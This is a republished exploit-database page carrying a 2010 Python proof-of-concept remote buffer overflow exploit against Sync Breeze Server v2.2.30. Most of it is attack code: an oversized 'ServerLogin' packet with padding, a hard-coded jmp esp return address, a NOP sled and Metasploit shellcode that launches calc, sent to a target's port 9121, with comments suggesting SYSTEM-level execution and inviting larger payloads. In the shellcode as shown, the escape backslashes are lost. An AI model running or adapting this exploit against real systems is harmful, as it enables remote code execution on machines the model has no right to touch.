Home / os / win7

[remote exploits] - Sync Breeze Server v2.2.30 Remote BOF Ex

Posted on 11 October 2010

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Sync Breeze Server v2.2.30 Remote BOF Exploit | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Sync Breeze Server v2.2.30 Remote BOF Exploit by xsploited security in remote exploits | Inj3ct0r - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>=============================================
Sync Breeze Server v2.2.30 Remote BOF Exploit
=============================================

#!/usr/bin/python
 
# Exploit Title: Sync Breeze Server v2.2.30 Remote BOF Exploit
# Date: 10/10/2010
# Author: Xsploited Security [aka xsploitedsec]
# URL: http://www.x-sploited.com/
# Contact: xsploitedsecurity [at] x-sploited.com
# Software Link: http://www.syncbreeze.com/setups/syncbreezesrv_setup_v2.2.30.exe
# Version: v2.2.30 (Others are most likely effected as well)
# Tested on: A Windows XP SP3 machine
# CVE : N/A
 
### Vulnerability Information: ###
# A vulnerability exists in the way Sync Breeze v2.2.30 processes its login requests after accepting a connection from a remote client.
# If a packet with a length greater than 484 bytes is received with the command prefix &quot;ServerLogin.&quot; the effected Service (syncbrs.exe)
# will crash, from the result of a buffer overflow. An attacker can easily leverage this vulnerability and control execution flow /
# execute arbitrary code.
###
# This PoCs Usage:
# 1. Verify that the service is running on the remote machine, the default port is 9121.
# 2. Execute syncbreeze.py against the host
# 3. Check remote machines process list for calc to verify successful command execution. (Running as SYSTEM, on my test machine at least..)
###
# Other notes:
# If the software is installed from an administrator account, shellcode will be executed at admin / (system) level. This could be a potential
# privelage escilation attack vector (although I have not verified this yet)
 
# I am sure a lot more can be done with this (fit more shellcode, universal etc.) I&#039;ll leave that up to researchers however.
# Have fun!
###
 
### Shouts:
# kAoTiX - Helping me verify this bug/exploit
# MAX - Keeps me entertained, makes me giggle
# CorelanCoder - Your tutorials are absolutely fking awesome
# exploit-db, offensive-sec, packetstormsecurity and all security teams and sites!
###
 
import sys,socket
 
if len(sys.argv) != 2:
    print &quot;[!] Usage: ./syncbreeze.py &lt;Target IP&gt;&quot;
    sys.exit(1)
 
about = &quot;=================================================
&quot;
about += &quot;Title: Sync Breeze Server v2.2.30 Remote BOF PoC
&quot;
about +=  &quot;Author: xsploited security
URL: http://www.x-sploited.com/
&quot;
about +=  &quot;Contact: xsploitedsecurity [at] gmail.com
&quot;
about +=  &quot;=================================================
&quot;
print about
 
host = sys.argv[1]
port = 9121             #default server port, unchangeable (I think)
 
# windows/exec - 218 bytes / http://www.metasploit.com
# Encoder: x86/fnstenv_mov / EXITFUNC=seh, CMD=calc
calc = (&quot;x6ax31x59xd9xeexd9x74x24xf4x5bx81x73x13x97x8c&quot;
&quot;x8ax10x83xebxfcxe2xf4x6bx64x03x10x97x8cxeax99&quot;
&quot;x72xbdx58x74x1cxdexbax9bxc5x80x01x42x83x07xf8&quot;
&quot;x38x98x3bxc0x36xa6x73xbbxd0x3bxb0xebx6cx95xa0&quot;
&quot;xaaxd1x58x81x8bxd7x75x7cxd8x47x1cxdex9ax9bxd5&quot;
&quot;xb0x8bxc0x1cxccxf2x95x57xf8xc0x11x47xdcx01x58&quot;
&quot;x8fx07xd2x30x96x5fx69x2cxdex07xbex9bx96x5axbb&quot;
&quot;xefxa6x4cx26xd1x58x81x8bxd7xafx6cxffxe4x94xf1&quot;
&quot;x72x2bxeaxa8xffxf2xcfx07xd2x34x96x5fxecx9bx9b&quot;
&quot;xc7x01x48x8bx8dx59x9bx93x07x8bxc0x1exc8xaex34&quot;
&quot;xccxd7xebx49xcdxddx75xf0xcfxd3xd0x9bx85x67x0c&quot;
&quot;x4dxfdx8dx07x95x2ex8cx8ax10xc7xe4xbbx9bxf8x0b&quot;
&quot;x75xc5x2cx72x84x22x7dxe4x2cx85x2ax11x75xc5xab&quot;
&quot;x8axf6x1ax17x77x6ax65x92x37xcdx03xe5xe3xe0x10&quot;
&quot;xc4x73x5fx73xf6xe0xe9x10&quot;);
     
# Begin payload buffer:
 
packet_header = (&quot;x53x65x72x76x65x72x4Cx6Fx67x69x6Ex02&quot;);
 
junk = &quot;x90&quot; * 256;            #265 byte junk buffer to reach eip
eip = &quot;xFBxF8xABx71&quot;;       #jmp esp (via ws2_32.dll)
nops = &quot;x90&quot; * 12;             #small nop sled
 
# packet structure:
# [header][junk][eip][nops][shellcode][nops][nops]
 
packet = packet_header + junk + eip + nops + calc + nops + nops;
 
print &quot;[*] Connecting to &quot; + host + &quot;...
&quot;
 
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
 
print &quot;[*] Connected, Sending payload
&quot;
s.send(packet + &quot;
&quot;)
print &quot;[*] Payload sent successfully&quot;
print &quot;[*] Check the results
&quot;
s.close()


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-10-11]</pre></body></html>

 

TOP